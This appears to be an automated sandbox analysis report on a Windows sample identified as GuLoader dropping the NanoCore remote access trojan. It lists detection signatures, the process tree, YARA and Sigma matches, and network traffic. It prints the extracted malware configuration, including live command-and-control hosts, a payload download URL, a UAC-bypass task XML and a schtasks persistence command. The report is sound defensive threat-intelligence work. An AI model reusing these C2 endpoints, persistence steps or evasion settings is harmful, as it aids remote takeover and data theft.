Loading ...

Play interactive tourEdit tour

Windows Analysis Report Doc0011222003.exe

Overview

General Information

Sample Name:Doc0011222003.exe
Analysis ID:527215
MD5:e70022c5636db76b71c8b2c56552c60c
SHA1:4589b37f02bb95d26bb2ba369c46c99268ce2985
SHA256:0226b26f82ea7ab25ad85a4cfda530f7b28f91b1d57f8ca0361b7b03e8ce59bb
Infos:

Most interesting Screenshot:

Detection

Nanocore GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • Doc0011222003.exe (PID: 676 cmdline: "C:\Users\user\Desktop\Doc0011222003.exe" MD5: E70022C5636DB76B71C8B2C56552C60C)
    • backgroundTaskHost.exe (PID: 1896 cmdline: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: DA7063B17DBB8BBB3015351016868006)
      • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 4216 cmdline: schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
        • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • CasPol.exe (PID: 1896 cmdline: "C:\Users\user\Desktop\Doc0011222003.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • CasPol.exe (PID: 1348 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0 MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
    • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • PEGASUS.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe" MD5: E70022C5636DB76B71C8B2C56552C60C)
    • CasPol.exe (PID: 1464 cmdline: "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
    • CasPol.exe (PID: 6192 cmdline: "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
    • CasPol.exe (PID: 6916 cmdline: "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • PEGASUS.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe" MD5: E70022C5636DB76B71C8B2C56552C60C)
    • CasPol.exe (PID: 420 cmdline: "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
    • CasPol.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1oM;"}

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "27c2db5e-046a-4be3-bf54-d8c28b56", "Group": "Sons and daughters", "Domain1": "abdul2u.ddns.net", "Domain2": "79.134.225.122", "Port": 6735, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.79927031030.0000000000510000.00000040.00000010.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.78191516120.0000000000540000.00000040.00000010.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0x23cef:$a: NanoCore
        • 0x23d48:$a: NanoCore
        • 0x23d85:$a: NanoCore
        • 0x23dfe:$a: NanoCore
        • 0x23d51:$b: ClientPlugin
        • 0x23d8e:$b: ClientPlugin
        • 0x2468c:$b: ClientPlugin
        • 0x24699:$b: ClientPlugin
        • 0x1ba5d:$e: KeepAlive
        • 0x241d9:$g: LogClientMessage
        • 0x24159:$i: get_Connected
        • 0x15d21:$j: #=q
        • 0x15d51:$j: #=q
        • 0x15d8d:$j: #=q
        • 0x15db5:$j: #=q
        • 0x15de5:$j: #=q
        • 0x15e15:$j: #=q
        • 0x15e45:$j: #=q
        • 0x15e75:$j: #=q
        • 0x15e91:$j: #=q
        • 0x15ec1:$j: #=q
        00000017.00000000.79578342155.0000000000E00000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Click to see the 11 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          23.2.CasPol.exe.1f189ca6.3.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0xe75:$x1: NanoCore.ClientPluginHost
          • 0x145e3:$x1: NanoCore.ClientPluginHost
          • 0x2d5c7:$x1: NanoCore.ClientPluginHost
          • 0xe8f:$x2: IClientNetworkHost
          • 0x14610:$x2: IClientNetworkHost
          • 0x2d5f4:$x2: IClientNetworkHost
          23.2.CasPol.exe.1f189ca6.3.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
          • 0xe75:$x2: NanoCore.ClientPluginHost
          • 0x145e3:$x2: NanoCore.ClientPluginHost
          • 0x2d5c7:$x2: NanoCore.ClientPluginHost
          • 0x1261:$s3: PipeExists
          • 0x1136:$s4: PipeCreated
          • 0x156be:$s4: PipeCreated
          • 0x2e6a2:$s4: PipeCreated
          • 0xeb0:$s5: IClientLoggingHost
          • 0x145fd:$s5: IClientLoggingHost
          • 0x2d5e1:$s5: IClientLoggingHost
          23.2.CasPol.exe.1f189ca6.3.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
            23.2.CasPol.exe.1f189ca6.3.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
            • 0xddf:$a: NanoCore
            • 0xe38:$a: NanoCore
            • 0xe75:$a: NanoCore
            • 0xeee:$a: NanoCore
            • 0x14599:$a: NanoCore
            • 0x145ae:$a: NanoCore
            • 0x145e3:$a: NanoCore
            • 0x2d57d:$a: NanoCore
            • 0x2d592:$a: NanoCore
            • 0x2d5c7:$a: NanoCore
            • 0xe41:$b: ClientPlugin
            • 0xe7e:$b: ClientPlugin
            • 0x177c:$b: ClientPlugin
            • 0x1789:$b: ClientPlugin
            • 0x14355:$b: ClientPlugin
            • 0x14370:$b: ClientPlugin
            • 0x143a0:$b: ClientPlugin
            • 0x145b7:$b: ClientPlugin
            • 0x145ec:$b: ClientPlugin
            • 0x2d339:$b: ClientPlugin
            • 0x2d354:$b: ClientPlugin
            23.2.CasPol.exe.1f18eadc.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
            • 0xd9ad:$x1: NanoCore.ClientPluginHost
            • 0xd9da:$x2: IClientNetworkHost
            Click to see the 25 entries

            Sigma Overview

            AV Detection:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1896, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

            E-Banking Fraud:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1896, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

            System Summary:

            barindex
            Sigma detected: Suspicius Add Task From User AppData TempShow sources
            Source: Process startedAuthor: frack113: Data: Command: schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp, CommandLine: schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca, ParentImage: C:\Windows\System32\backgroundTaskHost.exe, ParentProcessId: 1896, ProcessCommandLine: schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp, ProcessId: 4216

            Stealing of Sensitive Information:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1896, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

            Remote Access Functionality:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1896, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "27c2db5e-046a-4be3-bf54-d8c28b56", "Group": "Sons and daughters", "Domain1": "abdul2u.ddns.net", "Domain2": "79.134.225.122", "Port": 6735, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
            Source: 00000017.00000000.79578342155.0000000000E00000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1oM;"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: abdul2u.ddns.netVirustotal: Detection: 8%Perma Link
            Source: abdul2u.ddns.netVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeMetadefender: Detection: 14%Perma Link
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f18eadc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0aeadc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f18eadc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f193105.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0aeadc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0b3105.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.79863641955.000000001F141000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.79978540386.000000001E061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7356, type: MEMORYSTR
            Source: Doc0011222003.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49820 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49821 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49840 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49841 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49843 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49845 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49846 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\06e54f5fa1f15dd558eaf403cdcacad3\System.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5085e86702d2182b0d9417971c65ded2\System.Drawing.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ae952be8fa59744d6333aed90b72f162\System.Windows.Forms.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1oM;
            Source: Malware configuration extractorURLs: abdul2u.ddns.net
            Source: Malware configuration extractorURLs: 79.134.225.122
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: abdul2u.ddns.net
            Source: Joe Sandbox ViewASN Name: PTPEU PTPEU
            Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 79.134.225.122 79.134.225.122
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ag4bnhn9ga855bgu8d3ldr74vnelc1d/1637674800000/14482752613682931361/*/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-68-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
            Source: global trafficHTTP traffic detected: GET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-3g-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /nonceSigner?nonce=s94nbloa4nc92&continue=https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e%3Ddownload&hash=hqfbg0brbd0h8lf3lvpl1nnp6d5151ib HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
            Source: global trafficHTTP traffic detected: GET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download&nonce=s94nbloa4nc92&user=08866698715000929587Z&hash=ot9mkg4h11n1q8q8tl3fed9t5609m7ab HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-04-3g-docs.googleusercontent.comCookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0_nonce=s94nbloa4nc92
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
            Source: global trafficHTTP traffic detected: GET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-3g-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0=08866698715000929587Z|1637674950000|oi06qm5ps09ba9vtmvui6gpdeopbgkfu
            Source: global trafficTCP traffic: 192.168.11.20:49823 -> 194.147.140.112:6735
            Source: global trafficTCP traffic: 192.168.11.20:49826 -> 79.134.225.122:6735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
